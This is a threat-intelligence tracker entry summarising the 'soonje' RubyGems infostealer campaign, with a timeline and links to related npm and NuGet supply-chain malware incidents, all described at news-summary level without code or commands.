Soonje RubyGems infostealer package operation
Malware Activity
Summary
Hide ▲
Show ▼
The soonje package operation continues to spread malicious RubyGems that embed Windows infostealers, putting installer accounts and related credentials at risk. Since March 2023, the actor has published 60 packages that were downloaded more than 275,000 times. The packages were marketed as automation tools for gray-hat marketers, but they also siphoned usernames, passwords, and MAC addresses. Some packages remained live, extending the exposure to new installers.
Related Happenings
Contagious Interview npm malicious package campaign
Campaign
First: 28.11.2025 18:18
Last: 28.11.2025 18:18
Sources 1
About this happening:
The **Contagious Interview** campaign expanded with **197 more malicious npm packages**, extending a supply-chain delivery route that targets **npm users and developers**. The pac...
Contagious Interview npm malicious package campaign
CampaignAbout this happening: The **Contagious Interview** campaign expanded with **197 more malicious npm packages**, extending a supply-chain delivery route that targets **npm users and developers**. The pac...
Shanhai666 malicious NuGet package sabotage activity
Malware Activity
First: 07.11.2025 22:53
Last: 07.11.2025 22:53
Sources 1
About this happening:
**Nine malicious NuGet packages** published under **shanhai666** were found to contain dormant sabotage code that can disrupt **.NET database operations** and **Siemens S7 PLC com...
Shanhai666 malicious NuGet package sabotage activity
Malware ActivityAbout this happening: **Nine malicious NuGet packages** published under **shanhai666** were found to contain dormant sabotage code that can disrupt **.NET database operations** and **Siemens S7 PLC com...
Typosquatted npm packages delivering a PyInstaller infostealer
Malware Activity
First: 30.10.2025 01:16
Last: 30.10.2025 01:16
Sources 1
About this happening:
**Ten malicious npm packages** impersonated popular libraries and delivered a **24 MB PyInstaller infostealer** to developers on **Windows, Linux, and macOS**. The packages used *...
Typosquatted npm packages delivering a PyInstaller infostealer
Malware ActivityAbout this happening: **Ten malicious npm packages** impersonated popular libraries and delivered a **24 MB PyInstaller infostealer** to developers on **Windows, Linux, and macOS**. The packages used *...
Nethereum typosquatted NuGet package campaign with download inflation
Campaign
First: 22.10.2025 14:43
Last: 22.10.2025 14:43
Sources 1
About this happening:
**Typosquatted NuGet uploads** were used in a repeat campaign that tried to look popular enough to trick **developers** into installing a malicious dependency and exposing **crypt...
Nethereum typosquatted NuGet package campaign with download inflation
CampaignAbout this happening: **Typosquatted NuGet uploads** were used in a repeat campaign that tried to look popular enough to trick **developers** into installing a malicious dependency and exposing **crypt...
XCoderTools markets XWorm 6.0 lifetime access on cybercrime forums
Threat Actor Meta
First: 07.10.2025 13:36
Last: 07.10.2025 13:36
Sources 1
About this happening:
**XCoderTools** reemerged on **cybercrime forums** to sell **XWorm 6.0**, showing that the malware ecosystem still has active commercial demand. The build was priced at **$500** f...
XCoderTools markets XWorm 6.0 lifetime access on cybercrime forums
Threat Actor MetaAbout this happening: **XCoderTools** reemerged on **cybercrime forums** to sell **XWorm 6.0**, showing that the malware ecosystem still has active commercial demand. The build was priced at **$500** f...
Timeline
-
08.08.2025 23:47 1 articles · 9mo ago
Soonje RubyGems infostealer package operation
Initial DisclosureThe operation began in **March 2023** when **soonje** started publishing malicious **RubyGems** packages that posed as marketing automation tools. The packages also embedded **Windows infostealers**, turning a software-distribution channel into a credential-theft vector.
Show sources
- 60 RubyGems Packages Steal Data From Annoying Spammers — www.darkreading.com — 08.08.2025 23:47